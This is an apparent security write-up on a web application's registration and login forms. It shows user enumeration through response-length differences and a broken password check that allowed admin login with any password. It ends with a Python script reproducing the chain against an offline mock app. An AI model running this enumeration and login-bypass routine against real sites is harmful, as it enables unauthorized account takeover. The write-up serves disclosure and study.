On the registration form, attempting to register with an e-mail address that already exists in the system makes the application respond that this address is already registered. Because the application uses the e-mail address, rather than a separate username, as the login identifier, this is a user enumeration vulnerability: the registration endpoint confirms exactly which addresses have accounts.
In addition, broken password verification on the login form allowed logging in to any account by supplying only the correct e-mail address together with an arbitrary password.
When the two vulnerabilities are combined, every user account in the system can be compromised. Both issues fall under OWASP Top 10 2017 A2, Broken Authentication (see References). The following scenario demonstrates this clearly.
Take the registration HTTP request. The enumeration is performed over the e-mail address parameter.

As an example, I add five e-mail addresses that are already in the system and two new ones to my list.

When I run the attack, the responses with a length of 471 correspond to accounts being created, i.e. addresses that were not previously registered.

The responses with a length of 444 belong to addresses that already exist in the system; the response body itself says so. Among them I also found the admin e-mail address.

I log in with the admin e-mail address and a random wrong password (wrongpass).


I have successfully accessed the admin account.
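The attack chain described above, as an added example that is not part of the original write-up and not the target's code: a small Python reproduction that runs entirely offline against a constructed mock of the vulnerable application. The mock (`VulnerableApp`), its user list, the e-mail addresses, the paths `/register` and `/login`, and the response bodies are all assumptions made for illustration. The enumeration step buckets registration responses by length relative to one control address the tester knows is unregistered, mirroring the 471-versus-444 split seen in the write-up, and the final step tries the confirmed addresses with a deliberately wrong password.

```python
# Added example: offline reproduction of the enumeration + login-bypass chain.
# Nothing here is from the original write-up; the mock application, the e-mail
# addresses, the paths and the response bodies are constructed for illustration.
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Set


@dataclass
class Response:
    status: int
    body: str

    @property
    def length(self) -> int:
        return len(self.body)


# A transport is anything that takes (path, form fields) and returns a Response.
# Against a real target this would wrap an HTTP client; here the mock is called directly.
Transport = Callable[[str, Dict[str, str]], Response]


@dataclass
class VulnerableApp:
    """Constructed mock reproducing the two behaviours the write-up describes."""
    users: Set[str] = field(default_factory=lambda: {
        "admin@example.com", "alice@example.com", "bob@example.com"})

    def handle(self, path: str, form: Dict[str, str]) -> Response:
        email = form.get("email", "").strip().lower()
        if path == "/register":
            if email in self.users:
                # Flaw 1: the response reveals that the address is already taken.
                return Response(200, "<p>This e-mail is already registered.</p>")
            self.users.add(email)
            return Response(200, "<p>Account created. Check your inbox for the confirmation link.</p>")
        if path == "/login":
            # Flaw 2 (models the observed behaviour, not a known root cause):
            # only the e-mail is checked; the password is never verified.
            if email in self.users:
                return Response(302, "Location: /dashboard")
            return Response(401, "Invalid e-mail or password")
        return Response(404, "")


def probe_registration(send: Transport, emails: Iterable[str]) -> Dict[str, int]:
    """Submit each e-mail to the registration form and record the response length.
    Side effect on the target: every unregistered address gets a real account created,
    so use a throwaway password and clean up afterwards."""
    return {e: send("/register", {"email": e, "password": "Throwaway-Pass-1"}).length
            for e in emails}


def classify(lengths: Dict[str, int], control_email: str) -> Dict[str, List[str]]:
    """Split probed addresses into 'existing' and 'new' using one control address the
    tester knows is unregistered: the length the control produced is the 'account
    created' response; any other length means the address already existed."""
    new_len = lengths[control_email]
    buckets: Dict[str, List[str]] = {"existing": [], "new": []}
    for email, n in lengths.items():
        buckets["new" if n == new_len else "existing"].append(email)
    return buckets


def login_succeeds(send: Transport, email: str, password: str) -> bool:
    """In the mock a redirect to the dashboard marks a successful login."""
    return send("/login", {"email": email, "password": password}).status == 302


def run_attack(send: Transport, wordlist: List[str], control_email: str) -> Dict[str, object]:
    """Enumerate the wordlist via registration, then try each confirmed address
    with a wrong password, exactly as in the write-up's final step."""
    lengths = probe_registration(send, wordlist + [control_email])
    buckets = classify(lengths, control_email)
    bypassed = [e for e in buckets["existing"] if login_succeeds(send, e, "wrongpass")]
    return {"lengths": lengths, "existing": buckets["existing"], "bypassed": bypassed}


if __name__ == "__main__":
    app = VulnerableApp()
    result = run_attack(app.handle,
                        ["admin@example.com", "alice@example.com", "carol@example.com"],
                        control_email="attacker-control@example.com")
    for email, n in result["lengths"].items():
        print(f"{n:4d}  {email}")
    print("existing:", result["existing"])
    print("login bypassed for:", result["bypassed"])
```

Two practical caveats when running this logic against a real target: the length split only works if the "account created" page does not echo attacker-controlled input (if it does, compare on a fixed marker string instead of raw length), and every address that was not registered before the probe now has an account on the target, which must be reported and removed.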
References:
https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication